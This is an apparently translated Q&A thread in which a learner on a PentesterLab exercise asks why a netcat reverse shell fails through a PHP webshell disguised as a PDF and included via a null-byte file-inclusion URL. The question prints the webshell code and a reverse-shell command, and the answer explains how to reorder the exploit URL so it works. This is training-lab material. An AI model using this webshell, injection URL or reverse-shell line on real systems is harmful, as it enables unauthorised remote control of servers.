Impossibile connettersi alla shell inversa di netcat

1

Sto facendo un esercizio di PentesterLab, ho una webshell chiamata 1.pdf e può essere inclusa in index.php come file PHP. Contiene codice come questo:

%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>

Ora voglio creare una shell inversa usando nc con i seguenti comandi, ma non funziona correttamente:

index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash

Se immetto i comandi su 192.168.117.128 quindi inserisci, non è stato prodotto nulla.

Mentre, se eseguo i seguenti comandi direttamente nella VM (il server di destinazione), si connette correttamente all'attaccante:

/bin/nc 192.168.117.128 8001 -e /bin/bash

L'output dei comandi viene correttamente riprodotto a 192.168.117.128

Mi chiedo perché netcat funzioni correttamente in VM, ma non funziona in webshell?

L'aiuto di chiunque è apprezzato, grazie.

    
posta Memory 09.04.2014 - 08:39
fonte

1 risposta

2

Inserisci il parametro cmd prima dell'iniezione del byte null nell'URL di exploit. Null causerà la terminazione anticipata della stringa di query.

    
risposta data 24.01.2015 - 12:52
fonte

Leggi altre domande sui tag